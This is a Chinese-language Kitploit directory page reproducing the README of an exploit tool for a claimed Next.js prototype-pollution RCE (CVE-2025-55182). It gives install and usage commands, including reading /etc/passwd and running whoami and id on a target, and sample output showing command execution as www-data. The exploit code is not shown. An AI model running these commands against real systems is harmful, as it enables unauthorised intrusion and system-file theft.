Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-55182-node — CVE-2025-55182 Next.js RCE 漏洞利用工具 | Kitploit
工具/GitHubGitHub/racall/cve-2025-55182-node
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubracall/cve-2025-55182-node

cve-2025-55182-node

CVE-2025-55182 Next.js RCE 漏洞利用工具

查看仓库
18个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 Next.js RCE 漏洞利用工具

English | 漏洞原理分析


[!CAUTION]

⚠️ 免责声明 - 使用前必读

本工具仅供以下用途使用:

  • 安全研究人员进行漏洞验证
  • 获得明确授权的渗透测试
  • 教育和学习目的

未经授权访问计算机系统是违法行为!

使用本工具即表示您同意:

  1. 在测试任何系统之前已获得适当授权
  2. 不会将本工具用于恶意目的
  3. 您对自己的行为及其后果承担全部责任

作者对本工具的滥用不承担任何法律责任。


Next.js 服务端原型污染导致的远程代码执行漏洞利用工具。

漏洞概述

CVE-2025-55182 是一个影响 Next.js 的严重安全漏洞,攻击者可以通过精心构造的请求,利用原型污染实现远程代码执行 (RCE)。

📖 详细技术分析请参阅 EXPLOIT.md

影响版本

  • Next.js 特定版本(请参考官方安全公告)

漏洞原理

该漏洞利用 Next.js Server Actions 的请求处理机制,通过 __proto__ 原型链污染,结合 Function 构造函数实现任意代码执行。

安装

root@kitploit:~
# 使用 yarn
yarn install

# 使用 npm
npm install

使用方法

直接运行

root@kitploit:~
# 基本用法
node index.js <目标URL> [命令]

# 示例
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"

使用 yarn scripts

root@kitploit:~
# 运行工具
yarn start http://localhost:3000 "whoami"

# 或使用别名
yarn exploit http://localhost:3000 "ls -la"

# 查看帮助
yarn help

全局 CLI 安装

root@kitploit:~
# 链接到全局
yarn link
# 或
npm link

# 然后可以直接使用命令
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"

# 取消链接
yarn unlink

命令行选项

root@kitploit:~
Usage:
  cve-2025-55182 <url> [command]

Arguments:
  url       目标 URL (必需)
  command   要执行的命令 (默认: whoami)

Options:
  -h, --help     显示帮助信息
  -v, --version  显示版本号

输出格式

工具输出 JSON 格式的结果:

成功执行

root@kitploit:~
{
  "success": true,
  "message": "",
  "data": "命令执行结果"
}

执行失败

root@kitploit:~
{
  "success": false,
  "message": "错误信息",
  "data": null
}

示例

root@kitploit:~
$ cve-2025-55182 http://vulnerable-site.com "id"
{
  "success": true,
  "message": "",
  "data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}

依赖

  • axios - HTTP 客户端
  • form-data - FormData 构造

参考

  • Refer to Python scripts
下载工具